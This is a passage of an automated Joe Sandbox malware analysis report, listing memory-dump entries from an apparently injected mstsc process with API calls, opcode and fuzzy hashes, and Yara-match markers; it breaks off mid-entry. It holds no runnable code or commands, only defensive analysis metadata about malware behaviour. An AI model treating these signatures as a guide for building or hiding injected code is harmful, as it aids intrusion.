                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: a007c0ad624bbff04523e96fe97e958a9b637a8109d895d20b0463811e372b72
                                                                                                                                                                                      • Instruction ID: 3e86a27fc17ce68a75b8a13c1ae991fd2aaebf0b74985ebd578f81e54c7bd603
                                                                                                                                                                                      • Opcode Fuzzy Hash: a007c0ad624bbff04523e96fe97e958a9b637a8109d895d20b0463811e372b72
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A90023160524402F60075584614746104587D0246F61C815B0425668DD7B5D95175A2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: e4b2dd7430784963f6fb1b5e1508cad32925dce8b327ec9e1dba1ff4e7fc1b4e
                                                                                                                                                                                      • Instruction ID: 7bf24697fa5e800366cb758c521bbcf1900d233583c834db6373b3b1f0101e18
                                                                                                                                                                                      • Opcode Fuzzy Hash: e4b2dd7430784963f6fb1b5e1508cad32925dce8b327ec9e1dba1ff4e7fc1b4e
                                                                                                                                                                                      • Instruction Fuzzy Hash: C090022921314002F6807558550864A004587D1247F91D819B0016658CD935D8696321
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 7f9d0f8cedd46ad507483f6b2174c632d9649a426e95195cb879ed7dfb2b08b5
                                                                                                                                                                                      • Instruction ID: 1051a393d5100b2efc582d4734f2987f3c64bb9a9b7ddde20fb2e17bf756e9f4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f9d0f8cedd46ad507483f6b2174c632d9649a426e95195cb879ed7dfb2b08b5
                                                                                                                                                                                      • Instruction Fuzzy Hash: A7900221242181527A45B5584504547404697E0286791C416B1415A50CD536E856E621
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: f51bbbb2f9ea24b61f478414dd161d7bb1ab9979798f40660c2e5b24819ed3df
                                                                                                                                                                                      • Instruction ID: c2c3a85817010de3b104c36734038d37e23de5a42606bb4401fda7919c16cbd6
                                                                                                                                                                                      • Opcode Fuzzy Hash: f51bbbb2f9ea24b61f478414dd161d7bb1ab9979798f40660c2e5b24819ed3df
                                                                                                                                                                                      • Instruction Fuzzy Hash: AB90023120114413F61175584604747004987D0286F91C816B0425658DE676D952B121
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 4c955a5178a8ec7287342ce66dd28c037326fe275d62f90f824117aa9fe4bf61
                                                                                                                                                                                      • Instruction ID: 41a18cae3a700d8811babf9da91e925465a65d7a85ef785fa9bd160bd51fe24b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c955a5178a8ec7287342ce66dd28c037326fe275d62f90f824117aa9fe4bf61
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D90027120114402F64075584504786004587D0346F51C415B5065654ED679DDD57665
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: cb0dadcf3e6b6084f2c3801a5b0fa679c6b1fc7460c53d7b656bd8256b9b6517
                                                                                                                                                                                      • Instruction ID: 05c83201f2a66d0297f522ec69466b46f819c7d8071b8d235603217e3a7381fe
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb0dadcf3e6b6084f2c3801a5b0fa679c6b1fc7460c53d7b656bd8256b9b6517
                                                                                                                                                                                      • Instruction Fuzzy Hash: EC90026134114442F60075584514B460045C7E1346F51C419F1065654DD639DC527126
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 2fc2a99e81b08fc93aa827c060425503a49ab88ff360f8bf72e2e08c0a36d1b5
                                                                                                                                                                                      • Instruction ID: d17567520fa8378fc4f5201e39ba102a8b537e843294d24d5b87a82e9c72189f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fc2a99e81b08fc93aa827c060425503a49ab88ff360f8bf72e2e08c0a36d1b5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A90022121194042F70079684D14B47004587D0347F51C519B0155654CD935D8616521
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 0b59db7432bba491df1db76603ca6fe79d7987d3daad0e4fa0005cda118f5ec5
                                                                                                                                                                                      • Instruction ID: 48056bbae8c7720797513046a0246a90496c7fc90b45c2195dfe82c8ca65e17c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b59db7432bba491df1db76603ca6fe79d7987d3daad0e4fa0005cda118f5ec5
                                                                                                                                                                                      • Instruction Fuzzy Hash: AE900225211140032605B9580704547008687D5396351C425F1016650CE631D8616121
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: e1736fbfbd56bb10c04c77fc9b693424ec0e6eef6db546e9aaf5748ce8de06db
                                                                                                                                                                                      • Instruction ID: a1110bee3c5255511cc669049130770bd1a692d8d2faf9149e49818918e72c6a
                                                                                                                                                                                      • Opcode Fuzzy Hash: e1736fbfbd56bb10c04c77fc9b693424ec0e6eef6db546e9aaf5748ce8de06db
                                                                                                                                                                                      • Instruction Fuzzy Hash: 72900225221140022645B958070454B048597D6396391C419F1417690CD631D8656321
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 2e1a4084d7f44ce043354765a6f6185111e22a3bcb25c58e0c8bbfaf2de4d387
                                                                                                                                                                                      • Instruction ID: 99b8c519ea008c7884ed818179ee29f7ed519c8b38a28175c247cf29dce60c45
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e1a4084d7f44ce043354765a6f6185111e22a3bcb25c58e0c8bbfaf2de4d387
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F90023160514802F65075584514786004587D0346F51C415B0025754DD775DA5576A1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 978f8b73333d065e7792a2832321ef822929cd5f2dac2b6ef4af953b8498cab8
                                                                                                                                                                                      • Instruction ID: 1ecef5c6dc8ebde3422ec4426881f285906fd025ac392d150775c9d29cf302b5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 978f8b73333d065e7792a2832321ef822929cd5f2dac2b6ef4af953b8498cab8
                                                                                                                                                                                      • Instruction Fuzzy Hash: B090026120214003660575584514656404A87E0246B51C425F1015690DD535D8917125
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 57fcc32183696e780a97c77744be1ea4b08f7d36b2db3fc1ebad674dfb04bea9
                                                                                                                                                                                      • Instruction ID: fa9edecb7bfee88e02191092535512b96431d7fb1ffce3cd4bea3554770557ec
                                                                                                                                                                                      • Opcode Fuzzy Hash: 57fcc32183696e780a97c77744be1ea4b08f7d36b2db3fc1ebad674dfb04bea9
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9790023120518842F64075584504A86005587D034AF51C415B0065794DE635DD55B661
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 891739833a7aa2a039c16936904ebb65434c9794c8ec1c6a125d9577e984c4f8
                                                                                                                                                                                      • Instruction ID: 6221ea566762ed6b509285908b68dfa9826514032159be2699868c0d1b52c382
                                                                                                                                                                                      • Opcode Fuzzy Hash: 891739833a7aa2a039c16936904ebb65434c9794c8ec1c6a125d9577e984c4f8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7190023120114802F6807558450468A004587D1346F91C419B0026754DDA35DA5977A1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: ea2092cf89d31b6e3a84f3247d93d9619d9519778026d5f0a3db635fd179cdb7
                                                                                                                                                                                      • Instruction ID: abf1d53c4efe771f40d8151c60ea7bb64b127544bd56fc3de3c6c265d05f10a1
                                                                                                                                                                                      • Opcode Fuzzy Hash: ea2092cf89d31b6e3a84f3247d93d9619d9519778026d5f0a3db635fd179cdb7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F90023120114402F60079985508686004587E0346F51D415B5025655ED675D8917131
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: fc0519aee099e94699285e8334eb769d0a27ddfc3d15000bb524c531f5e66248
                                                                                                                                                                                      • Instruction ID: f5aafdaa57357beaacbe5695734b779afd6db9f9092f273918131654d1c948cc
                                                                                                                                                                                      • Opcode Fuzzy Hash: fc0519aee099e94699285e8334eb769d0a27ddfc3d15000bb524c531f5e66248
                                                                                                                                                                                      • Instruction Fuzzy Hash: E890023120114842F60075584504B86004587E0346F51C41AB0125754DD635D8517521
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000006.00000002.6585063432.00000000046D9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_45b0000_mstsc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 54cc22702afca0b12edc9f91f296b91307349db30a466944087ecf8cfdc6837b
                                                                                                                                                                                      • Instruction ID: 22966948a9a6b95d28514eb3d49c4b2be5b95df87f329afe6edfc4173d9ce787
                                                                                                                                                                                      • Opcode Fuzzy Hash: 54cc22702afca0b12edc9f91f296b91307349db30a466944087ecf8cfdc6837b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 649002312011C802F6107558850478A004587D0346F55C815B4425758DD6B5D8917121
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                      • API String ID: 2340568224-3887548279
                                                                                                                                                                                      • Opcode ID: d13f2372a1ef0024c1f5109102356f78cc8cdd0d1abeecbd4d164177256bc0e6
                                                                                                                                                                                      • Instruction ID: 306dd8b4a167821eeaed764cf36e8ff6f66a1830a428abc8fd5e26477b0404e0
                                                                                                                                                                                      • Opcode Fuzzy Hash: d13f2372a1ef0024c1f5109102356f78cc8cdd0d1abeecbd4d164177256bc0e6
                                                                                                                                                                                      • Instruction Fuzzy Hash: B171B7B1D00218AADB24EBA5CD41FEEB778AF44304F00456EF55563181EF78A7858FA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 0041B4EB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                                                                      • Opcode ID: 3b252e9a96213aae835e49f78f013ed2a517dc523e82440eb70a22379aa7b1f8
                                                                                                                                                                                      • Instruction ID: 1db740092eea5cdc4e3fbbc7918b86e7eaa9dc7a94f7caa5147e730ffbdb35c0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b252e9a96213aae835e49f78f013ed2a517dc523e82440eb70a22379aa7b1f8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F319CB5600604BBD724DFA4D881FE7B7F8EB48704F00816EEA5D4B285D378A580CBA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 0041B4EB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                                                                      • Opcode ID: f26e2bc0ca5bf0b29051546aaf0bffec6056242f3e5623933e520fb968865118
                                                                                                                                                                                      • Instruction ID: d1848215c1bd1d4623b19c04717918d78800d7ec7519a9a33e4712edba6f6b0e
                                                                                                                                                                                      • Opcode Fuzzy Hash: f26e2bc0ca5bf0b29051546aaf0bffec6056242f3e5623933e520fb968865118
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A31C4B5A00204BBD714DFB4D882BD6BBB8EB48704F10816EE61D5B281D3786585CB94
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CoInitialize.OLE32(00000000,00000000,004047C7,00000000), ref: 00414D27
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Initialize
                                                                                                                                                                                      • String ID: @J7<
                                                                                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                                                                                      • Opcode ID: 7406217a6c8752c5d87bcd1bf520979de88631eb5ed791f8eaacf6ae0f4977bd
                                                                                                                                                                                      • Instruction ID: 73cbd1a38a75206f465ef9aae25b7caf7e289570a2d463bd9d97ce21116cf1b9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7406217a6c8752c5d87bcd1bf520979de88631eb5ed791f8eaacf6ae0f4977bd
                                                                                                                                                                                      • Instruction Fuzzy Hash: CD314FB5A0020AAFDB10DFD9D8809EFB7B9BF88304B108559E915EB314D775EE45CBA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CoInitialize.OLE32(00000000,00000000,004047C7,00000000), ref: 00414D27
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Initialize
                                                                                                                                                                                      • String ID: @J7<
                                                                                                                                                                                      • API String ID: 2538663250-2016760708
                                                                                                                                                                                      • Opcode ID: e6fbc238c45f2f37feaf739124dd3904cb655b437e8addc070133c7cff007b3f
                                                                                                                                                                                      • Instruction ID: 1df84a8aae395b0a390c56391f948d2479701bd3c2b795f58dd9e4b219af5da1
                                                                                                                                                                                      • Opcode Fuzzy Hash: e6fbc238c45f2f37feaf739124dd3904cb655b437e8addc070133c7cff007b3f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D3150B5A0020AAFDB10DFD9D8809EFB7B9FF88304B108559E915EB304D775EE458BA0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 0040768A
                                                                                                                                                                                      • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 004076AB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_mstsc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                                                      • Opcode ID: f7da3335141b60c58d4a1a1c729bc0f0e5c200c02283b11a76dedf29671fac5f
                                                                                                                                                                                      • Instruction ID: 6bc614ca193d88dd54889e3e36495340bcb4a94ae92fc533975a0728be3381d5
